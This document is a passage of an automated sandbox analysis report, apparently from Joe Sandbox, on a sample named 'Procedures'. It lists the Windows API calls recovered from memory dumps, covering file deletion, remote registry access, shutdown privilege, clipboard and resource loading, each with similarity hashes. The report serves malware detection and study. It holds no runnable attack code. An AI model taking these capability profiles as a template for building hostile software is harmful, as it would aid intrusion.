                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00EE7B94), ref: 00E9A1AD
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9A1B7
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A1C4
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A1D4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: aa309117222c36471ccfabbbaf65be79ebd03c4a1aed05d951f4de67c7951ab6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 66edecede945583a7fdc2091ae7bb3b6b414351f7679481ae4568f1c0ab6e3aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa309117222c36471ccfabbbaf65be79ebd03c4a1aed05d951f4de67c7951ab6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B831047260525E6FDF14AFB6EC49ADF77AC9F04324F081161E814F20A0EB74DE458AA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E94785
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E947B2
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E947E2
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E94803
                                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00E94813
                                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E9489A
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E948A5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E948B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6f6f4afcfc8ed55bd76a14f882113da0e3b0c9446743478da83f48f4e7afee95
                                                                                                                                                                                                                                                                                                    • Instruction ID: 08b7cccf5196cc8dc56e541bc596814661c670a1b3e74796f4a225722bbc4a1b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f6f4afcfc8ed55bd76a14f882113da0e3b0c9446743478da83f48f4e7afee95
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 633190B190424AABDF219BA1DC49FEB37BCEF89744F1051B6F609F20A0E77096458B24
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E9A203
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E9A25E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A269
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E9A285
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E9A2D5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00EE7B94), ref: 00E9A2F3
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9A2FD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A30A
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A31A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E8E3B4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 59b319c1354a0a426dc1af74b0c4b6e55803d5693c0fe329620af472ca749ca4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 74470ba0b638545db1a36b5d483e9033154424d1a04a1cf03397f215c340ff29
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59b319c1354a0a426dc1af74b0c4b6e55803d5693c0fe329620af472ca749ca4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931F27260425E6FCF10EFA5EC09ADF77AD9F45328F1851B1E810B30A1EB35DE858A91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC99E
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00EACA09
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EACA2D
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EACA8C
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EACB47
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EACBB4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EACC49
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00EACC9A
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00EACD43
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EACDE2
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EACDEF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c7d53bc187cbfbc65c48772b37cb94d62bda5893dafe1ad8dbe830181457e219
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4b3285b4c4a113cc0a19f06de9447dc320d4a196cc9553baed523201fc4ca001
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7d53bc187cbfbc65c48772b37cb94d62bda5893dafe1ad8dbe830181457e219
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B0260716042009FC714DF24C891E2ABBE5EF89318F1894ADF84AEF2A2D731EC46CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E255D1,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E25871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8EAB0: GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E8D9CD
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E8DA88
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E8DA9B
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E8DAB8
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E8DAE2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E8DAC7,?,?), ref: 00E8DB5D
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00E8DAFE
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8DB0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: e941e4a78e9de836dfac8bec5e9baafc8c7f659177b3d3ffb0a703f0411f55fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: e9fac0b2b4c1784d016ca571cae82ed5d6811394f959b8c30585802b54786a1b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e941e4a78e9de836dfac8bec5e9baafc8c7f659177b3d3ffb0a703f0411f55fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26614D3190915DAECF05FBE0EE929EDB7B5AF14304F2051A5E40AB71A1EB716F09CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a26f704b6fef9b1a030e100b712f655039fc91a38ed0cbf863df41af400010a8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2f1ac06a57c0d955c900bf1ae78bcc5f2e778dfdbbcd8a702278038638690445
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a26f704b6fef9b1a030e100b712f655039fc91a38ed0cbf863df41af400010a8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D41CE31604611AFD724CF15E888B5ABBE4FF44318F14C1A8E819EB762DB35ED41CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E82087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: GetLastError.KERNEL32 ref: 00E82097
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00E8F249
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                    • Opcode ID: 83206acb9afb04c26f708107d9f011a18cebed28a540bfbb0a37d01bf55b98c5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 436e4e2067603f5e1edcf13ce42b7c5c2c133680cb2e515af173133d2e9bb71a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83206acb9afb04c26f708107d9f011a18cebed28a540bfbb0a37d01bf55b98c5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D01D67A6142146FEB2472B89C8ABFB72AC9B08349F151531FD0EF21F2E6615D0593A0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?), ref: 00E2233E
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00E22421
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00E22434
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$Proc
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 929743424-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: d9db9a1e18712221aea17c243c6710123e6044efbd1d7998cc02c5a01c63d8fb
                                                                                                                                                                                                                                                                                                    • Instruction ID: ce8807035c5525244ccd3df34cdb7279cfd9d6da003e6d65f08725baeffc0501
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9db9a1e18712221aea17c243c6710123e6044efbd1d7998cc02c5a01c63d8fb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B8149B0144021BEE23DAA3D7C98EFF259EEB42348F15210EF302F6592CA599F41C276
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E656C2,?,?,00000000,00000000), ref: 00E93A1E
                                                                                                                                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E656C2,?,?,00000000,00000000), ref: 00E93A35
                                                                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00E656C2,?,?,00000000,00000000,?,?,?,?,?,?,00E266CE), ref: 00E93A45
                                                                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00E656C2,?,?,00000000,00000000,?,?,?,?,?,?,00E266CE), ref: 00E93A56
                                                                                                                                                                                                                                                                                                    • LockResource.KERNEL32(00E656C2,?,?,00E656C2,?,?,00000000,00000000,?,?,?,?,?,?,00E266CE,?), ref: 00E93A65
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a74a942cb1ad2ca0215b73dfdd814b7d9f4d872c45cc77d28b529d278fe1ef5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 74ec699b849e7e25a8f6e07967ce9d1fcb90f40a28367e35175d1427bedcc2e6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a74a942cb1ad2ca0215b73dfdd814b7d9f4d872c45cc77d28b529d278fe1ef5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11CB70200301BFEB208F26DC48F677BB9EBC4B14F10426CB452E62A0EBB1EC008A20
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E81916
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E81922
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E81931
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E81938
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E8194E
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00E81C81), ref: 00E820FB
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E82107
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00E8210E
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E82127
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00E81C81), ref: 00E8213B
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E82142
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b26d1ecd3dbcb6719df4a6972440fd62ccc7e7642ce9f0099bb39f5e324a9650
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3d41c39da6ac18fb9a896e25956d381d1b0538d5924dcbf02ec7fedaa11f9582
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b26d1ecd3dbcb6719df4a6972440fd62ccc7e7642ce9f0099bb39f5e324a9650
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A911ACB1502205FFDB14AB65CC0DBAF7BBAEF44359F24811CEA49B7120D7359945CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E9A5BD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E9A6D0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E942B9: GetInputState.USER32 ref: 00E94310
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E943AB
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E9A5ED
